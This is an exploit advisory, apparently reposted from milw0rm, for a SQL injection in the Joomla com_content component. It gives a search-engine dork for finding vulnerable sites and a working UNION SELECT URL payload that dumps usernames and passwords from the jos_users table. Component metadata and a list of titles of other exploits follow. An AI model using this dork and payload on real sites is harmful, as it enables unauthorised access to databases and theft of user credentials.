-------------------------------------------------------------------------------------------
Joomla Component com_content SQL Injection Vulnerabity
-------------------------------------------------------------------------------------------
Author : unknown_styler
Dork : inurl:com_content
POC : http://localhost/index.php?option=index.php?option=com_content&task=blogcategory&id=60&Itemid={SQL}
Example : http://localhost/index.php?option=com_content&task=blogcategory&id=60&Itemid=99999 union select 1,concat_ws(0x3a,username,password),3,4,5 from jos_users/*
------------------------------------------------------------------------------------------------------------------------------------
Greetings : h4ck-y0u.org
side note:
<name>Página de contenido</name>
<author>Projecte Joomla!</author>
<creationDate>July 2004</creationDate>
<copyright>(C) 2005 Open Source Matters. All rights reserved.</copyright>
<license>http://www.gnu.org/copyleft/gpl.html GNU/GPL</license>
<authorEmail>admin@joomla.org</authorEmail>
<authorUrl>www.joomla.org</authorUrl>
<version>1.0.0</version>
# milw0rm.com [2008-07-08]
【Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln】相关文章:
★ Pragyan CMS 2.6.2 (sourceFolder) Remote File Inclusion Vulnerability
★ trixbox (langChoice) Local File Inclusion Exploit (connect-back)
★ Easy Photo Gallery 2.1 XSS/FD/Bypass/SQL Injection Exploit
★ Joomla Component n-forms 1.01 Blind SQL Injection Exploit
★ LoveCMS 1.6.2 Final Update Settings Remote Exploit
★ Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability
★ Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit
★ Boonex Dolphin 6.1.2 Multiple Remote File Inclusion Vulnerabilities
★ CodeDB (list.php lang) Local File Inclusion Vulnerability
★ Yourownbux 4.0 (COOKIE) Authentication Bypass Exploit